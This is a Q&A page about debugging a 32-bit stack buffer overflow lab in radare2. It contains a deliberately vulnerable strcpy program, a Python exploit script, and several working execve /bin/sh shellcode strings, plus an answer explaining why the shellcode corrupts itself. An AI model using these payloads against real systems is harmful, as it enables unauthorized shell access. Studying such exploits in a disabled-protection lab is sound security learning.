Search code examples
assemblybuffer-overflowshellcode

(radare2, shellcode) int 0x80 jumping to invalid address

I'm executing a 32bit program (my arch is 64bit).

Vulnerable code:

#include <string.h>
#include <stdio.h>
void main(int argc, char *argv[]) {
    copier(argv[1]);
    printf("Done!\n");
}
int copier(char *str) {
    char buffer[100];
    strcpy(buffer, str);
}


Exploit:

#!/usr/bin/python3

ret = b"\xb0\xcd\xff\xff"
shellcode = (b"\xeb\x1d\x5e\x8d\x46\x05\x31\xdb\x88\x5e\x09\x89\x70\x05\x89\x5e\x0e\x8d"
             b"\x1e\x8d\x48\x05\x8d\x50\x09\x31\xc0\xb0\x0b\xcd\x80\xe8\xde\xff\xff\xff"
             b"\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43")

payload = b"\x90"*40+ shellcode + b"A"*(112 - 40 - len(shellcode)) + ret

open("bo1.payload", "wb").write(payload)


But when exploiting, it doesn't. When executed outside debugger there is a SegmentFault error.
Before int 0x80
Just after int 0x80
Q1 I think this is because the execve replaced the previouse code. Is that?
so i pressed 'q' and the command 'dc' to continue. 

[0xf7dd7c30]> dc
Selecting and continuing: 16145
child stopped with signal 17
[+] SIGNAL 17 errno=0 addr=0x3e80000546d code=1 ret=0
got signal...
[+] signal 17 aka SIGCHLD received 0

[3]+  Arrêté                r2 -d ./bo1 $(cat bo1.payload)


Q2 Why 'child stopped with signal 17' and no shell prompted after int 0x80?

Edit:
ASLR sysctl -w kernel.randomize_va_space=0
compiled with 'gcc -g -fno-stack-protector -z execstack -m32 -o bo1 bo1.c'

Edit2:
Apparently the problem is in the shellcodes. I tried all these, only the last one works and prompted the shell. 

shellcode = (b"\x31\xc0\x31\xdb\xb0\x06\xcd\x80"
             b"\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80"
             b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80")

shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
             b"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")

shellcode = (b"\x31\xc0\xb0\x01\x31\xdb\xcd\x80")

shellcode = (b"\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89\x46\x0e\x8d\x1e\x8d\x4e"
             b"\x0a\x8d\x56\x0e\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f"
             b"\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43")

shellcode = (b"\xeb\x1d\x5e\x8d\x46\x05\x31\xdb\x88\x5e\x09\x89\x70\x05\x89\x5e\x0e\x8d"
             b"\x1e\x8d\x48\x05\x8d\x50\x09\x31\xc0\xb0\x0b\xcd\x80\xe8\xde\xff\xff\xff"
             b"\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43")

shellcode = (b"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2"
             b"\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
             b"\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80")

Solution

  • The reason itself is easy enough to explain, just the push instructions in the shellcode erased the ending bytes of shellcode (noticed the eip is on stack and very near esp, right?) prefix the shellcode with "add esp, 0x70" is enough in most times.

    However, I think you need to learn how to debug the program before asking questions. Use gdb, learn some assembly, and learn how shellcode works, so that you can know how it does not work.

    For example in shellcode1 it ends with \xcd\x80 which is int 0x80. But when you debug, the final int 0x80 disappears before the final execve call completed. That is strange, therefore one need to consider what had modified the shellcode.